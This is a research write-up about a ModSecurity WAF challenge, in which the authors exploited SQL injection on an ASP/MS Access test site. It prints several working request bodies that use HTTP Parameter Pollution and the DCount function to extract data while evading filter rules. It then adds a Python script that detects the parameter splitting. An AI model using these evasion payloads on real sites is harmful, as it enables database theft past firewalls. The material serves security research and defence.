Positive Research, the innovation department of Positive Technologies, has received thanks from Trustwave, the developers of the ModSecurity web application firewall, for its Web Application Firewall research.
The testing consisted of two stages. In the first stage, competitors had to exploit SQL injection to extract data from the databases of the test sites. The second stage was harder: the task was the same, but competitors had to bypass the ModSecurity filter rules without generating any firewall events.
Security experts are usually interested in protection mechanisms, so in 2009 Dmitry Evteev, a Positive Research expert, proposed a universal technique for bypassing ModSecurity filtering (http://ptresearch.blogspot.com/2009/11/another-fine-method-to-exploit-sql.html). The design of the new ModSecurity version draws on these ideas.
Positive Research experts successfully completed all the tasks and bypassed the restrictions of the ModSecurity WAF running the up-to-date filter rules. The developers plan to use the results to improve the firewall's effectiveness.
Alexander Anisimov, Positive Research team leader, remarks: «A Web Application Firewall protects most web applications from mass attacks. But our penetration testing clearly shows that a Web Application Firewall «from the box» is unable to protect systems from a great number of targeted attacks. So we believe the best way is to use a WAF to eliminate detected vulnerabilities. A possible solution is to integrate the MaxPatrol compliance and vulnerability management system with the ModSecurity Web Application Firewall».
More details about the competition are available here: http://www.modsecurity.org/demo/challenge.html.
To complete level 1, participants had to provide the organizers with the above-listed data and details of how they obtained it. Only then did they get access to ModSecurity. This is the Speed Hack itself. So by the evening of 24 June there was no chance of any uncompleted stages remaining on level 1. But, surprisingly, level 1 was still open for the web sites that had not been hacked by the evening of 24 June. The PT Research Team members easily exploited the detected SQL injections on the sites that used MS Access. Not long after, the organizers confirmed us as level 1 winners, and level 1 was closed because everything had been hacked. According to the organizers, they processed about 500 solutions, but nobody else had been able to exploit the SQL injection vulnerability in the MS Access database. We think the reason is its unpopularity =)
Then we tried to solve task 2: exploit SQL injection while bypassing the up-to-date ModSecurity WAF rules. We decided to use the method from the first stage and exploit the vulnerability on the IBM test site (IIS + ASP + MS Access).
To bypass the WAF we use MS Access operators together with the way IIS and ASP handle repeated request parameters, which allows us to conduct an HTTP Parameter Pollution (HPP) attack.
We exploit an SQL injection vulnerability in the test site script transaction.asp: user input is insufficiently validated in the server-side script, which allows attackers to inject SQL.
Below are the requests that are not detected by ModSecurity and that allow you to obtain all the data needed to connect to the web site database.
A crafted SQL request that explicitly names a database is enough to obtain the database name. An error-based method with brute force was used to find existing databases through requests naming non-existent ones: the web application responds with an MS Access error indicating that the database does not exist.
Here is an example:
__VIEWSTATE=[skipped]&after=1 and (select 1&after=1 from a.c)&before=2—1
Here is an example:
__VIEWSTATE=[skipped]&after=1 and (select 1&after=1 from users1)&before=2—1
Here is an example:
__VIEWSTATE=[skipped]&after=&before=1231 group by 1&before=transid having 1
First, we create a statement that allows us to detect data in the database. Here is the request:
__VIEWSTATE=[skipped]&after=1 AND (select username from users where username='admin')&before=d
__VIEWSTATE=[skipped]&after=1 AND (select mid(last(username)&after=1&after=1) from users where username='admin') &before=d
It works, but the WAF filters it, specifically “mid(” and similar character sequences. We found the DCount function in the MS Access manual, which allows us to exploit the vulnerability and bypass the WAF. Here is an example:
__VIEWSTATE=[skipped]&after=1 AND (select DCount(last(username)&after=1&after=1) from users where username='ad1min')&before=d
You can retrieve the database data by brute force.
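The following Python script is an added example, not code from the original post or from Positive Research, and shows the detection side of the parameter-splitting technique used in the requests above. It parses a request body twice: once per occurrence, which is what a rule applied to each argument value sees, and once merged the way the classic ASP Request collection returns a repeated parameter (occurrences joined by ", "; ASP.NET joins with ","), and runs the same simple signatures over both views. The sample bodies are constructed from the requests quoted above with __VIEWSTATE shortened; the joiner, the signatures and the function names are my own assumptions and are not ModSecurity rules.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample bodies, based on the requests shown above (__VIEWSTATE shortened).
SAMPLES = {
    "db_probe": "__VIEWSTATE=x&after=1 and (select 1&after=1 from a.c)&before=2",
    "group_by": "__VIEWSTATE=x&after=&before=1231 group by 1&before=transid having 1",
    "dcount": ("__VIEWSTATE=x&after=1 AND (select DCount(last(username)"
               "&after=1&after=1) from users where username='admin')&before=d"),
    "benign": "__VIEWSTATE=x&after=1&before=2",
}

# Deliberately simple signatures: each needs both halves of a clause to sit in ONE
# value, which is exactly what splitting the payload across repeated parameters defeats.
SQLI_PATTERNS = [
    re.compile(r"\bselect\b.+\bfrom\b", re.I | re.S),
    re.compile(r"\bgroup\s+by\b.+\bhaving\b", re.I | re.S),
]


def per_value_view(body):
    """Every (name, value) pair as sent: what a per-argument WAF check inspects."""
    return parse_qsl(body, keep_blank_values=True)


def backend_view(body, joiner=", "):
    """Repeated parameters merged into one string, as classic ASP's Request()
    returns them (assumed joiner ', '; ASP.NET uses ',')."""
    merged = {}
    for name, value in per_value_view(body):
        merged[name] = value if name not in merged else merged[name] + joiner + value
    return merged


def looks_like_sqli(value):
    return any(p.search(value) for p in SQLI_PATTERNS)


def inspect(body, joiner=", "):
    """Compare what the per-value check and the backend-aware check would flag."""
    pairs = per_value_view(body)
    merged = backend_view(body, joiner)
    counts = {}
    for name, _ in pairs:
        counts[name] = counts.get(name, 0) + 1
    return {
        "naive": [name for name, value in pairs if looks_like_sqli(value)],
        "hpp_aware": [name for name, value in merged.items() if looks_like_sqli(value)],
        "duplicated": sorted(name for name, n in counts.items() if n > 1),
        "merged": merged,
    }


if __name__ == "__main__":
    for label, body in SAMPLES.items():
        result = inspect(body)
        print(f"{label:9s} naive={result['naive']} hpp_aware={result['hpp_aware']} "
              f"duplicated={result['duplicated']}")
        for name in result["duplicated"]:
            print(f"          backend sees {name} = {result['merged'][name]!r}")
```

Running it shows that none of the three crafted bodies is flagged by the per-value check, while the merged view of each reconstructs a complete clause (for example `1 and (select 1, 1 from a.c)`) and is flagged. The practical point for a WAF deployment in front of an ASP backend is to inspect argument values as the backend will assemble them, and to treat a parameter that repeats when the form never sends it twice as a signal in its own right.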